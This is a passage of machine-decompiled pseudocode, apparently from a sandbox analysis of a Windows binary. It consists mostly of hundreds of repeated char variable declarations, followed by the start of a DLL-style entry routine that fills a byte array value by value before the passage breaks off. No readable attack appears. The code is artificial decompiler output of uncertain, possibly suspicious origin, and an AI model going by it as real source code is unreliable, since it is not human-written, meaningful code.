				char _v829;
				char _v830;
				char _v831;
				char _v832;
				char _v833;
				char _v834;
				char _v835;
				char _v836;
				char _v837;
				char _v838;
				char _v839;
				char _v840;
				char _v841;
				char _v842;
				char _v843;
				char _v844;
				char _v845;
				char _v846;
				char _v847;
				char _v848;
				char _v849;
				char _v850;
				char _v851;
				char _v852;
				char _v853;
				char _v854;
				char _v855;
				char _v856;
				char _v857;
				char _v858;
				char _v859;
				char _v860;
				char _v861;
				char _v862;
				char _v863;
				char _v864;
				char _v865;
				char _v866;
				char _v867;
				char _v868;
				char _v869;
				char _v870;
				char _v871;
				char _v872;
				char _v873;
				char _v874;
				char _v875;
				char _v876;
				char _v877;
				char _v878;
				char _v879;
				char _v880;
				char _v881;
				char _v882;
				char _v883;
				char _v884;
				char _v885;
				char _v886;
				char _v887;
				char _v888;
				char _v889;
				char _v890;
				char _v891;
				char _v892;
				char _v893;
				char _v894;
				char _v895;
				char _v896;
				char _v897;
				char _v898;
				char _v899;
				char _v900;
				char _v901;
				char _v902;
				char _v903;
				char _v904;
				char _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				char _v910;
				char _v911;
				char _v912;
				char _v913;
				char _v914;
				char _v915;
				char _v916;
				char _v917;
				char _v918;
				char _v919;
				char _v920;
				char _v921;
				char _v922;
				char _v923;
				char _v924;
				char _v925;
				char _v926;
				char _v927;
				char _v928;
				char _v929;
				char _v930;
				char _v931;
				char _v932;
				char _v933;
				char _v934;
				char _v935;
				char _v936;
				char _v937;
				char _v938;
				char _v939;
				char _v940;
				char _v941;
				char _v942;
				char _v943;
				char _v944;
				char _v945;
				char _v946;
				char _v947;
				char _v948;
				char _v949;
				char _v950;
				char _v951;
				char _v952;
				char _v953;
				char _v954;
				char _v955;
				char _v956;
				char _v957;
				char _v958;
				char _v959;
				char _v960;
				char _v961;
				char _v962;
				char _v963;
				char _v964;
				char _v965;
				char _v966;
				char _v967;
				char _v968;
				char _v969;
				char _v970;
				char _v971;
				char _v972;
				char _v973;
				char _v974;
				char _v975;
				char _v976;
				char _v977;
				char _v978;
				char _v979;
				char _v980;
				char _v981;
				char _v982;
				char _v983;
				char _v984;
				char _v985;
				char _v986;
				char _v987;
				char _v988;
				char _v989;
				char _v990;
				char _v991;
				char _v992;
				char _v993;
				char _v994;
				char _v995;
				char _v996;
				char _v997;
				char _v998;
				char _v999;
				char _v1000;
				char _v1001;
				char _v1002;
				char _v1003;
				char _v1004;
				char _v1005;
				char _v1006;
				char _v1007;
				char _v1008;
				char _v1009;
				char _v1010;
				char _v1011;
				char _v1012;
				char _v1013;
				char _v1014;
				char _v1015;
				char _v1016;
				char _v1017;
				char _v1018;
				char _v1019;
				char _v1020;
				char _v1021;
				char _v1022;
				char _v1023;
				char _v1024;
				char _v1025;
				char _v1026;
				char _v1027;
				char _v1028;
				char _v1029;
				char _v1030;
				char _v1031;
				char _v1032;
				char _v1033;
				char _v1034;
				char _v1035;
				char _v1036;
				char _v1037;
				char _v1038;
				char _v1039;
				char _v1040;
				char _v1041;
				char _v1042;
				char _v1043;
				char _v1044;
				char _v1045;
				char _v1046;
				char _v1047;
				char _v1048;
				char _v1049;
				char _v1050;
				char _v1051;
				char _v1052;
				char _v1053;
				char _v1054;
				char _v1055;
				char _v1056;
				char _v1057;
				char _v1058;
				char _v1059;
				char _v1060;
				char _v1061;
				char _v1062;
				char _v1063;
				char _v1064;
				char _v1065;
				char _v1066;
				char _v1067;
				char _v1068;
				char _v1069;
				char _v1070;
				char _v1071;
				char _v1072;
				char _v1073;
				char _v1074;
				char _v1075;
				char _v1076;
				char _v1077;
				char _v1078;
				char _v1079;
				char _v1080;
				char _v1081;
				char _v1082;
				char _v1083;
				char _v1084;
				char _v1085;
				char _v1086;
				char _v1087;
				char _v1088;
				char _v1089;
				char _v1090;
				char _v1091;
				char _v1092;
				char _v1093;
				char _v1094;
				char _v1095;
				char _v1096;
				char _v1097;
				char _v1098;
				char _v1099;
				char _v1100;
				char _v1101;
				char _v1102;
				char _v1103;
				char _v1104;
				char _v1105;
				char _v1106;
				char _v1107;
				char _v1108;
				char _v1109;
				char _v1110;
				char _v1111;
				char _v1112;
				char _v1113;
				char _v1114;
				char _v1115;
				char _v1116;
				char _v1117;
				char _v1118;
				char _v1119;
				char _v1120;
				char _v1121;
				char _v1122;
				char _v1123;
				char _v1124;
				char _v1125;
				char _v1126;
				char _v1127;
				char _v1128;
				char _v1129;
				char _v1130;
				char _v1131;
				char _v1132;
				char _v1133;
				char _v1134;
				char _v1135;
				char _v1136;
				char _v1137;
				char _v1138;
				char _v1139;
				char _v1140;
				char _v1141;
				char _v1142;
				char _v1143;
				char _v1144;
				char _v1145;
				char _v1146;
				char _v1147;
				char _v1148;
				char _v1149;
				char _v1150;
				char _v1151;
				char _v1152;
				char _v1153;
				char _v1154;
				char _v1155;
				char _v1156;
				char _v1157;
				char _v1158;
				char _v1159;
				char _v1160;
				char _v1161;
				char _v1162;
				char _v1163;
				char _v1164;
				char _v1165;
				char _v1166;
				char _v1167;
				char _v1168;
				char _v1169;
				char _v1170;
				char _v1171;
				char _v1172;
				char _v1173;
				char _v1174;
				char _v1175;
				char _v1176;
				char _v1177;
				char _v1178;
				char _v1179;
				char _v1180;
				char _v1181;
				char _v1182;
				char _v1183;
				char _v1184;
				char _v1185;
				char _v1186;
				char _v1187;
				char _v1188;
				char _v1189;
				char _v1190;
				char _v1191;
				char _v1192;
				char _v1193;
				char _v1194;
				char _v1195;
				char _v1196;
				char _v1197;
				char _v1198;
				char _v1199;
				char _v1200;
				char _v1201;
				char _v1202;
				char _v1203;
				char _v1204;
				char _v1205;
				char _v1206;
				char _v1207;
				char _v1208;
				char _v1209;
				char _v1210;
				char _v1211;
				char _v1212;
				char _v1213;
				char _v1214;
				char _v1215;
				char _v1216;
				char _v1217;
				char _v1218;
				char _v1219;
				char _v1220;
				char _v1221;
				char _v1222;
				char _v1223;
				char _v1224;
				char _v1225;
				char _v1226;
				char _v1227;
				char _v1228;
				char _v1229;
				char _v1230;
				char _v1231;
				char _v1232;
				char _v1233;
				char _v1234;
				char _v1235;
				char _v1236;
				char _v1237;
				char _v1238;
				char _v1239;
				char _v1240;
				char _v1241;
				char _v1242;
				char _v1243;
				char _v1244;
				char _v1245;
				char _v1246;
				char _v1247;
				char _v1248;
				char _v1249;
				char _v1250;
				char _v1251;
				char _v1252;
				char _v1253;
				char _v1254;
				char _v1255;
				char _v1256;
				char _v1257;
				char _v1258;
				char _v1259;
				char _v1260;
				char _v1261;
				char _v1262;
				char _v1263;
				char _v1264;
				char _v1265;
				char _v1266;
				char _v1267;
				char _v1268;
				char _v1269;
				char _v1270;
				char _v1271;
				char _v1272;
				char _v1273;
				char _v1274;
				char _v1275;
				char _v1276;
				char _v1277;
				char _v1278;
				char _v1279;
				char _v1280;
				char _v1281;
				char _v1282;
				char _v1283;
				char _v1284;
				char _v1285;
				char _v1286;
				char _v1287;
				char _v1288;
				char _v1289;
				char _v1290;
				char _v1291;
				char _v1292;
				char _v1293;
				char _v1294;
				char _v1295;
				char _v1296;
				char _v1297;
				char _v1298;
				char _v1299;
				char _v1300;
				char _v1301;
				char _v1302;
				char _v1303;
				char _v1304;
				char _v1305;
				char _v1306;
				char _v1307;
				char _v1308;
				char _v1309;
				char _v1310;
				char _v1311;
				char _v1312;
				char _v1313;
				char _v1314;
				char _v1315;
				char _v1316;
				char _v1317;
				char _v1318;
				char _v1319;
				char _v1320;
				char _v1321;
				char _v1322;
				char _v1323;
				char _v1324;
				char _v1325;
				char _v1326;
				char _v1327;
				char _v1328;
				char _v1329;
				char _v1330;
				char _v1331;
				char _v1332;
				char _v1333;
				char _v1334;
				char _v1335;
				char _v1336;
				char _v1337;
				char _v1338;
				char _v1339;
				char _v1340;
				char _v1341;
				char _v1342;
				char _v1343;
				char _v1344;
				char _v1345;
				char _v1346;
				char _v1347;
				char _v1348;
				char _v1349;
				char _v1350;
				char _v1351;
				char _v1352;
				char _v1353;
				char _v1354;
				char _v1355;
				char _v1356;
				char _v1357;
				char _v1358;
				char _v1359;
				char _v1360;
				char _v1361;
				char _v1362;
				char _v1363;
				char _v1364;
				char _v1365;
				char _v1366;
				char _v1367;
				char _v1368;
				char _v1369;
				char _v1370;
				char _v1371;
				char _v1372;
				char _v1373;
				char _v1374;
				char _v1375;
				char _v1376;
				char _v1377;
				char _v1378;
				char _v1379;
				char _v1380;
				char _v1381;
				char _v1382;
				char _v1383;
				char _v1384;
				char _v1385;
				char _v1386;
				char _v1387;
				char _v1388;
				char _v1389;
				char _v1390;
				char _v1391;
				char _v1392;
				char _v1393;
				char _v1394;
				char _v1395;
				char _v1396;
				char _v1397;
				char _v1398;
				char _v1399;
				char _v1400;
				char _v1401;
				char _v1402;
				char _v1403;
				char _v1404;
				char _v1405;
				char _v1406;
				char _v1407;
				char _v1408;
				char _v1409;
				char _v1410;
				char _v1411;
				char _v1412;
				char _v1413;
				char _v1414;
				char _v1415;
				char _v1416;
				char _v1417;
				char _v1418;
				char _v1419;
				char _v1420;
				char _v1421;
				char _v1422;
				char _v1423;
				char _v1424;
				char _v1425;
				char _v1426;
				char _v1427;
				char _v1428;
				char _v1429;
				char _v1430;
				char _v1431;
				char _v1432;
				char _v1433;
				char _v1434;
				char _v1435;
				char _v1436;
				char _v1437;
				char _v1438;
				char _v1439;
				char _v1440;
				char _v1441;
				char _v1442;
				char _v1443;
				char _v1444;
				char _v1445;
				char _v1446;
				char _v1447;
				char _v1448;
				char _v1449;
				char _v1450;
				char _v1451;
				char _v1452;
				char _v1453;
				char _v1454;
				char _v1455;
				char _v1456;
				char _v1457;
				char _v1458;
				char _v1459;
				char _v1460;
				char _v1461;
				char _v1462;
				char _v1463;
				char _v1464;
				char _v1465;
				char _v1466;
				char _v1467;
				char _v1468;
				char _v1469;
				char _v1470;
				char _v1471;
				char _v1472;
				char _v1473;
				char _v1474;
				char _v1475;
				char _v1476;
				char _v1477;
				char _v1478;
				char _v1479;
				char _v1480;
				char _v1481;
				char _v1482;
				char _v1483;
				char _v1484;
				char _v1485;
				char _v1486;
				char _v1487;
				char _v1488;
				char _v1489;
				char _v1490;
				char _v1491;
				char _v1492;
				char _v1493;
				char _v1494;
				char _v1495;
				char _v1496;
				char _v1497;
				char _v1498;
				char _v1499;
				char _v1500;
				char _v1501;
				char _v1502;
				char _v1503;
				char _v1504;
				char _v1505;
				char _v1506;
				char _v1507;
				char _v1508;
				char _v1509;
				char _v1510;
				char _v1511;
				char _v1512;
				char _v1513;
				char _v1514;
				char _v1515;
				char _v1516;
				char _v1517;
				char _v1518;
				char _v1519;
				char _v1520;
				char _v1521;
				char _v1522;
				char _v1523;
				char _v1524;
				char _v1525;
				char _v1526;
				char _v1527;
				char _v1528;
				char _v1529;
				char _v1530;
				char _v1531;
				char _v1532;
				char _v1533;
				char _v1534;
				char _v1535;
				char _v1536;
				char _v1537;
				char _v1538;
				char _v1539;
				char _v1540;
				char _v1541;
				char _v1542;
				char _v1543;
				char _v1544;
				char _v1545;
				char _v1546;
				char _v1547;
				char _v1548;
				char _v1549;
				char _v1550;
				char _v1551;
				char _v1552;
				char _v1553;
				char _v1554;
				char _v1555;
				char _v1556;
				char _v1557;
				char _v1558;
				char _v1559;
				char _v1560;
				char _v1561;
				char _v1562;
				char _v1563;
				char _v1564;
				char _v1565;
				char _v1566;
				char _v1567;
				char _v1568;
				char _v1569;
				char _v1570;
				char _v1571;
				char _v1572;
				char _v1573;
				char _v1574;
				char _v1575;
				char _v1576;
				char _v1577;
				char _v1578;
				char _v1579;
				char _v1580;
				char _v1581;
				char _v1582;
				char _v1583;
				char _v1584;
				char _v1585;
				char _v1586;
				char _v1587;
				char _v1588;
				char _v1589;
				char _v1590;
				char _v1591;
				char _v1592;
				char _v1593;
				char _v1594;
				char _v1595;
				char _v1596;
				char _v1597;
				char _v1598;
				char _v1599;
				char _v1600;
				char _v1601;
				char _v1602;
				char _v1603;
				char _v1604;
				char _v1605;
				char _v1606;
				char _v1607;
				char _v1608;
				char _v1609;
				char _v1610;
				char _v1611;
				char _v1612;
				char _v1613;
				char _v1614;
				char _v1615;
				char _v1616;
				char _v1617;
				char _v1618;
				char _v1619;
				char _v1620;
				char _v1621;
				char _v1622;
				char _v1623;
				char _v1624;
				char _v1625;
				char _v1626;
				char _v1627;
				char _v1628;
				char _v1629;
				char _v1630;
				char _v1631;
				char _v1632;
				char _v1633;
				char _v1634;
				char _v1635;
				char _v1636;
				char _v1637;
				char _v1638;
				char _v1639;
				char _v1640;
				char _v1641;
				char _v1642;
				char _v1643;
				char _v1644;
				char _v1645;
				char _v1646;
				char _v1647;
				char _v1648;
				char _v1649;
				char _v1650;
				char _v1651;
				char _v1652;
				char _v1653;
				char _v1654;
				char _v1655;
				char _v1656;
				char _v1657;
				char _v1658;
				char _v1659;
				char _v1660;
				char _v1661;
				char _v1662;
				char _v1663;
				char _v1664;
				char _v1665;
				char _v1666;
				char _v1667;
				char _v1668;
				char _v1669;
				char _v1670;
				char _v1671;
				char _v1672;
				char _v1673;
				char _v1674;
				char _v1675;
				char _v1676;
				char _v1677;
				char _v1678;
				char _v1679;
				char _v1680;
				char _v1681;
				char _v1682;
				char _v1683;
				char _v1684;
				char _v1685;
				char _v1686;
				char _v1687;
				char _v1688;
				char _v1689;
				char _v1690;
				char _v1691;
				char _v1692;
				char _v1693;
				char _v1694;
				char _v1695;
				char _v1696;
				char _v1697;
				char _v1698;
				char _v1699;
				char _v1700;
				char _v1701;
				char _v1702;
				char _v1703;
				char _v1704;
				char _v1705;
				char _v1706;
				char _v1707;
				char _v1708;
				char _v1709;
				char _v1710;
				char _v1711;
				char _v1712;
				char _v1713;
				char _v1714;
				char _v1715;
				char _v1716;
				char _v1717;
				char _v1718;
				char _v1719;
				char _v1720;
				char _v1721;
				char _v1722;
				char _v1723;
				char _v1724;
				char _v1725;
				char _v1726;
				char _v1727;
				char _v1728;
				char _v1729;
				char _v1730;
				char _v1731;
				char _v1732;
				char _v1733;
				char _v1734;
				char _v1735;
				char _v1736;
				char _v1737;
				char _v1738;
				char _v1739;
				char _v1740;
				char _v1741;
				char _v1742;
				char _v1743;
				char _v1744;
				char _v1745;
				char _v1746;
				char _v1747;
				char _v1748;
				char _v1749;
				char _v1750;
				char _v1751;
				char _v1752;
				char _v1753;
				char _v1754;
				char _v1755;
				char _v1756;
				char _v1757;
				char _v1758;
				char _v1759;
				char _v1760;
				char _v1761;
				char _v1762;
				char _v1763;
				char _v1764;
				char _v1765;
				char _v1766;
				char _v1767;
				char _v1768;
				char _v1769;
				char _v1770;
				char _v1771;
				char _v1772;
				char _v1773;
				char _v1774;
				char _v1775;
				char _v1776;
				char _v1777;
				char _v1778;
				char _v1779;
				char _v1780;
				char _v1781;
				char _v1782;
				char _v1783;
				char _v1784;
				char _v1785;
				char _v1786;
				char _v1787;
				char _v1788;
				char _v1789;
				char _v1790;
				char _v1791;
				char _v1792;
				char _v1793;
				char _v1794;
				char _v1795;
				char _v1796;
				char _v1797;
				char _v1798;
				char _v1799;
				char _v1800;
				char _v1801;
				char _v1802;
				char _v1803;
				char _v1804;
				char _v1805;
				char _v1806;
				char _v1807;
				char _v1808;
				char _v1809;
				char _v1810;
				char _v1811;
				char _v1812;
				char _v1813;
				char _v1814;
				char _v1815;
				char _v1816;
				char _v1817;
				char _v1818;
				char _v1819;
				char _v1820;
				char _v1821;
				char _v1822;
				char _v1823;
				char _v1824;
				char _v1825;
				char _v1826;
				char _v1827;
				char _v1828;
				char _v1829;
				char _v1830;
				char _v1831;
				char _v1832;
				char _v1833;
				char _v1834;
				char _v1835;
				char _v1836;
				char _v1837;
				char _v1838;
				char _v1839;
				char _v1840;
				char _v1841;
				char _v1842;
				char _v1843;
				char _v1844;
				char _v1845;
				char _v1846;
				char _v1847;
				char _v1848;
				char _v1849;
				char _v1850;
				char _v1851;
				char _v1852;
				char _v1853;
				char _v1854;
				char _v1855;
				char _v1856;
				char _v1857;
				char _v1858;
				char _v1859;
				char _v1860;
				char _v1861;
				char _v1862;
				char _v1863;
				char _v1864;
				char _v1865;
				char _v1866;
				char _v1867;
				char _v1868;
				char _v1869;
				char _v1870;
				char _v1871;
				char _v1872;
				char _v1873;
				char _v1874;
				char _v1875;
				char _v1876;
				char _v1877;
				char _v1878;
				char _v1879;
				char _v1880;
				char _v1881;
				char _v1882;
				char _v1883;
				char _v1884;
				char _v1885;
				char _v1886;
				char _v1887;
				char _v1888;
				char _v1889;
				char _v1890;
				char _v1891;
				char _v1892;
				char _v1893;
				char _v1894;
				char _v1895;
				char _v1896;
				char _v1897;
				char _v1898;
				char _v1899;
				char _v1900;
				char _v1901;
				char _v1902;
				char _v1903;
				char _v1904;
				char _v1905;
				char _v1906;
				char _v1907;
				char _v1908;
				char _v1909;
				char _v1910;
				char _v1911;
				char _v1912;
				char _v1913;
				char _v1914;
				char _v1915;
				char _v1916;
				char _v1917;
				char _v1918;
				char _v1919;
				char _v1920;
				char _v1921;
				char _v1922;
				char _v1923;
				char _v1924;
				char _v1925;
				char _v1926;
				char _v1927;
				char _v1928;
				char _v1929;
				char _v1930;
				char _v1931;
				char _v1932;
				char _v1933;
				char _v1934;
				char _v1935;
				char _v1936;
				char _v1937;
				char _v1938;
				char _v1939;
				char _v1940;
				char _v1941;
				char _v1942;
				char _v1943;
				char _v1944;
				char _v1945;
				char _v1946;
				char _v1947;
				char _v1948;
				char _v1949;
				char _v1950;
				char _v1951;
				char _v1952;
				char _v1953;
				char _v1954;
				char _v1955;
				char _v1956;
				char _v1957;
				char _v1958;
				char _v1959;
				char _v1960;
				char _v1961;
				char _v1962;
				char _v1963;
				char _v1964;
				char _v1965;
				char _v1966;
				char _v1967;
				char _v1968;
				char _v1969;
				char _v1970;
				char _v1971;
				char _v1972;
				char _v1973;
				char _v1974;
				char _v1975;
				char _v1976;
				char _v1977;
				char _v1978;
				char _v1979;
				char _v1980;
				char _v1981;
				char _v1982;
				char _v1983;
				char _v1984;
				char _v1985;
				char _v1986;
				char _v1987;
				char _v1988;
				char _v1989;
				char _v1990;
				char _v1991;
				char _v1992;
				char _v1993;
				char _v1994;
				char _v1995;
				char _v1996;
				char _v1997;
				char _v1998;
				char _v1999;
				char _v2000;
				char _v2001;
				char _v2002;
				char _v2003;
				char _v2004;
				char _v2005;
				char _v2006;
				char _v2007;
				char _v2008;
				char _v2009;
				char _v2010;
				char _v2011;
				char _v2012;
				char _v2013;
				char _v2014;
				char _v2015;
				char _v2016;
				char _v2017;
				char _v2018;
				char _v2019;
				char _v2020;
				char _v2021;
				char _v2022;
				char _v2023;
				char _v2024;
				char _v2025;
				char _v2026;
				char _v2027;
				char _v2028;
				char _v2029;
				char _v2030;
				char _v2031;
				char _v2032;
				char _v2033;
				char _v2034;
				char _v2035;
				char _v2036;
				char _v2037;
				char _v2038;
				char _v2039;
				char _v2040;
				char _v2041;
				char _v2042;
				char _v2043;
				char _v2044;
				char _v2045;
				char _v2046;
				char _v2047;
				char _v2048;
				char _v2049;
				char _v2050;
				char _v2051;
				char _v2052;
				char _v2053;
				char _v2054;
				char _v2055;
				char _v2056;
				char _v2057;
				char _v2058;
				char _v2059;
				char _v2060;
				char _v2061;
				char _v2062;
				char _v2063;
				char _v2064;
				char _v2065;
				char _v2066;
				char _v2067;
				char _v2068;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v2073;
				char _v2074;
				char _v2075;
				char _v2076;
				char _v2077;
				char _v2078;
				char _v2079;
				char _v2080;
				char _v2081;
				char _v2082;
				char _v2083;
				char _v2084;
				char _v2085;
				char _v2086;
				char _v2087;
				char _v2088;
				char _v2089;
				char _v2090;
				char _v2091;
				char _v2092;
				char _v2093;
				char _v2094;
				char _v2095;
				char _v2096;
				char _v2097;
				char _v2098;
				char _v2099;
				char _v2100;
				char _v2101;
				char _v2102;
				char _v2103;
				char _v2104;
				char _v2105;
				char _v2106;
				char _v2107;
				char _v2108;
				char _v2109;
				char _v2110;
				char _v2111;
				char _v2112;
				char _v2113;
				char _v2114;
				char _v2115;
				char _v2116;
				char _v2117;
				char _v2118;
				char _v2119;
				char _v2120;
				char _v2121;
				char _v2122;
				char _v2123;
				char _v2124;
				char _v2125;
				char _v2126;
				char _v2127;
				char _v2128;
				char _v2129;
				char _v2130;
				char _v2131;
				char _v2132;
				char _v2133;
				char _v2134;
				char _v2135;
				char _v2136;
				char _v2137;
				char _v2138;
				char _v2139;
				char _v2140;
				char _v2141;
				char _v2142;
				char _v2143;
				char _v2144;
				char _v2145;
				char _v2146;
				char _v2147;
				char _v2148;
				char _v2149;
				char _v2150;
				char _v2151;
				char _v2152;
				char _v2153;
				char _v2154;
				char _v2155;
				char _v2156;
				char _v2157;
				char _v2158;
				char _v2159;
				char _v2160;
				char _v2161;
				char _v2162;
				char _v2163;
				char _v2164;
				char _v2165;
				char _v2166;
				char _v2167;
				char _v2168;
				char _v2169;
				char _v2170;
				char _v2171;
				char _v2172;
				char _v2173;
				char _v2174;
				char _v2175;
				char _v2176;
				char _v2177;
				char _v2178;
				char _v2179;
				char _v2180;
				char _v2181;
				char _v2182;
				char _v2183;
				char _v2184;
				char _v2185;
				char _v2186;
				char _v2187;
				char _v2188;
				char _v2189;
				char _v2190;
				char _v2191;
				char _v2192;
				char _v2193;
				char _v2194;
				char _v2195;
				char _v2196;
				char _v2197;
				char _v2198;
				char _v2199;
				char _v2200;
				char _v2201;
				char _v2202;
				char _v2203;
				char _v2204;
				char _v2205;
				char _v2206;
				char _v2207;
				char _v2208;
				char _v2209;
				char _v2210;
				char _v2211;
				char _v2212;
				char _v2213;
				char _v2214;
				char _v2215;
				char _v2216;
				char _v2217;
				char _v2218;
				char _v2219;
				char _v2220;
				char _v2221;
				char _v2222;
				char _v2223;
				char _v2224;
				char _v2225;
				char _v2226;
				char _v2227;
				char _v2228;
				char _v2229;
				char _v2230;
				char _v2231;
				char _v2232;
				char _v2233;
				char _v2234;
				char _v2235;
				char _v2236;
				char _v2237;
				char _v2238;
				char _v2239;
				char _v2240;
				char _v2241;
				char _v2242;
				char _v2243;
				char _v2244;
				char _v2245;
				char _v2246;
				char _v2247;
				char _v2248;
				char _v2249;
				char _v2250;
				char _v2251;
				char _v2252;
				char _v2253;
				char _v2254;
				char _v2255;
				char _v2256;
				char _v2257;
				char _v2258;
				char _v2259;
				char _v2260;
				char _v2261;
				char _v2262;
				char _v2263;
				char _v2264;
				char _v2265;
				char _v2266;
				char _v2267;
				char _v2268;
				char _v2269;
				char _v2270;
				char _v2271;
				char _v2272;
				char _v2273;
				char _v2274;
				char _v2275;
				char _v2276;
				char _v2277;
				char _v2278;
				char _v2279;
				char _v2280;
				char _v2281;
				char _v2282;
				char _v2283;
				char _v2284;
				char _v2285;
				char _v2286;
				char _v2287;
				char _v2288;
				char _v2289;
				char _v2290;
				char _v2291;
				char _v2292;
				char _v2293;
				char _v2294;
				char _v2295;
				char _v2296;
				char _v2297;
				char _v2298;
				char _v2299;
				char _v2300;
				char _v2301;
				char _v2302;
				char _v2303;
				char _v2304;
				char _v2305;
				char _v2306;
				char _v2307;
				char _v2308;
				char _v2309;
				char _v2310;
				char _v2311;
				char _v2312;
				char _v2313;
				char _v2314;
				char _v2315;
				char _v2316;
				char _v2317;
				char _v2318;
				char _v2319;
				char _v2320;
				char _v2321;
				char _v2322;
				char _v2323;
				char _v2324;
				char _v2325;
				char _v2326;
				char _v2327;
				char _v2328;
				char _v2329;
				char _v2330;
				char _v2331;
				char _v2332;
				char _v2333;
				char _v2334;
				char _v2335;
				char _v2336;
				char _v2337;
				char _v2338;
				char _v2339;
				char _v2340;
				char _v2341;
				char _v2342;
				char _v2343;
				char _v2344;
				char _v2345;
				char _v2346;
				char _v2347;
				char _v2348;
				char _v2349;
				char _v2350;
				char _v2351;
				char _v2352;
				char _v2353;
				char _v2354;
				char _v2355;
				char _v2356;
				char _v2357;
				char _v2358;
				char _v2359;
				char _v2360;
				char _v2361;
				char _v2362;
				char _v2363;
				char _v2364;
				char _v2365;
				char _v2366;
				char _v2367;
				char _v2368;
				char _v2369;
				char _v2370;
				char _v2371;
				char _v2372;
				char _v2373;
				char _v2374;
				char _v2375;
				char _v2376;
				char _v2377;
				char _v2378;
				char _v2379;
				char _v2380;
				char _v2381;
				char _v2382;
				char _v2383;
				char _v2384;
				char _v2385;
				char _v2386;
				char _v2387;
				char _v2388;
				char _v2389;
				char _v2390;
				char _v2391;
				char _v2392;
				char _v2393;
				char _v2394;
				char _v2395;
				char _v2396;
				char _v2397;
				char _v2398;
				char _v2399;
				char _v2400;
				char _v2401;
				char _v2402;
				char _v2403;
				char _v2404;
				char _v2405;
				char _v2406;
				char _v2407;
				char _v2408;
				char _v2409;
				char _v2410;
				char _v2411;
				char _v2412;
				char _v2413;
				char _v2414;
				char _v2415;
				char _v2416;
				char _v2417;
				char _v2418;
				char _v2419;
				char _v2420;
				char _v2421;
				char _v2422;
				char _v2423;
				char _v2424;
				char _v2425;
				char _v2426;
				char _v2427;
				char _v2428;
				char _v2429;
				char _v2430;
				char _v2431;
				char _v2432;
				char _v2433;
				char _v2434;
				char _v2435;
				char _v2436;
				char _v2437;
				char _v2438;
				char _v2439;
				char _v2440;
				char _v2441;
				char _v2442;
				char _v2443;
				char _v2444;
				char _v2445;
				char _v2446;
				char _v2447;
				char _v2448;
				char _v2449;
				char _v2450;
				char _v2451;
				char _v2452;
				char _v2453;
				char _v2454;
				char _v2455;
				char _v2456;
				char _v2457;
				char _v2458;
				char _v2459;
				char _v2460;
				char _v2461;
				char _v2462;
				char _v2463;
				char _v2464;
				char _v2465;
				char _v2466;
				char _v2467;
				char _v2468;
				char _v2469;
				char _v2470;
				char _v2471;
				char _v2472;
				char _v2473;
				char _v2474;
				char _v2475;
				char _v2476;
				char _v2477;
				char _v2478;
				char _v2479;
				char _v2480;
				char _v2481;
				char _v2482;
				char _v2483;
				char _v2484;
				char _v2485;
				char _v2486;
				char _v2487;
				char _v2488;
				char _v2489;
				char _v2490;
				char _v2491;
				char _v2492;
				char _v2493;
				char _v2494;
				char _v2495;
				char _v2496;
				char _v2497;
				char _v2498;
				char _v2499;
				char _v2500;
				char _v2501;
				char _v2502;
				char _v2503;
				char _v2504;
				char _v2505;
				char _v2506;
				char _v2507;
				char _v2508;
				char _v2509;
				char _v2510;
				char _v2511;
				char _v2512;
				char _v2513;
				char _v2514;
				char _v2515;
				char _v2516;
				char _v2517;
				char _v2518;
				char _v2519;
				char _v2520;
				char _v2521;
				char _v2522;
				char _v2523;
				char _v2524;
				char _v2525;
				char _v2526;
				char _v2527;
				char _v2528;
				char _v2529;
				char _v2530;
				char _v2531;
				char _v2532;
				char _v2533;
				char _v2534;
				char _v2535;
				char _v2536;
				char _v2537;
				char _v2538;
				char _v2539;
				char _v2540;
				char _v2541;
				char _v2542;
				char _v2543;
				char _v2544;
				char _v2545;
				char _v2546;
				char _v2547;
				char _v2548;
				char _v2549;
				char _v2550;
				char _v2551;
				char _v2552;
				char _v2553;
				char _v2554;
				char _v2555;
				char _v2556;
				char _v2557;
				char _v2558;
				char _v2559;
				char _v2560;
				char _v2561;
				char _v2562;
				char _v2563;
				char _v2564;
				char _v2565;
				char _v2566;
				char _v2567;
				char _v2568;
				char _v2569;
				char _v2570;
				char _v2571;
				char _v2572;
				char _v2573;
				char _v2574;
				char _v2575;
				char _v2576;
				char _v2577;
				char _v2578;
				char _v2579;
				char _v2580;
				char _v2581;
				char _v2582;
				char _v2583;
				char _v2584;
				char _v2585;
				char _v2586;
				char _v2587;
				char _v2588;
				char _v2589;
				char _v2590;
				char _v2591;
				char _v2592;
				char _v2593;
				char _v2594;
				char _v2595;
				char _v2596;
				char _v2597;
				char _v2598;
				char _v2599;
				char _v2600;
				char _v2601;
				char _v2602;
				char _v2603;
				char _v2604;
				char _v2605;
				char _v2606;
				char _v2607;
				char _v2608;
				char _v2609;
				char _v2610;
				char _v2611;
				char _v2612;
				char _v2613;
				char _v2614;
				char _v2615;
				char _v2616;
				char _v2617;
				char _v2618;
				char _v2619;
				char _v2620;
				char _v2621;
				char _v2622;
				char _v2623;
				char _v2624;
				char _v2625;
				char _v2626;
				char _v2627;
				char _v2628;
				char _v2629;
				char _v2630;
				char _v2631;
				char _v2632;
				char _v2672;
				char _v2704;
				void* _v2736;
				char _v2752;
				signed long long _v2760;
				long long _v2768;
				char _v2776;
				signed int _v2780;
				intOrPtr _v2784;
				signed long long _v2792;
				signed char _v2796;
				signed char _v2800;
				signed char _v2804;
				signed char _v2808;
				signed int _t2669;
				signed long long _t2714;
				signed long long _t2715;
				long long _t2716;
				signed long long _t2748;

				_t2746 = __rdi;
				_t2703 = __edi;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_t2714 =  *0xaede008; // 0xa3acf2c2a32b
				_t2715 = _t2714 ^ _t2748;
				_v24 = _t2715;
				_v2784 = _a16;
				if (_v2784 == 1) goto 0xae73fee;
				goto 0xae793e5;
				_v2796 = 0;
				_v2800 = 0;
				_v2768 = 0;
				_v2792 = 0;
				E00007FFA7FFA0AE697DC(_a16, __rcx); // executed
				_v2792 = _t2715;
				if (_v2792 == 0) goto 0xae74039;
				r8d = 0x5f5e100;
				E00007FFA7FFA0AE66920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
				E00007FFA7FFA0AE693A8(_t2715, __rbx, _v2792, __rsi); // executed
				 *0xaedea20 = 0;
				 *0xaedea14 = 0;
				 *0xaedea24 = 0;
				 *0xaedea18 = 0;
				 *0xaedea1c = 0;
				 *0xaedea10 = 0;
				_v2632 = 0x62;
				_v2631 = 0xfa;
				_v2630 = 0x28;
				_v2629 = 0x18;
				_v2628 = 0x56;
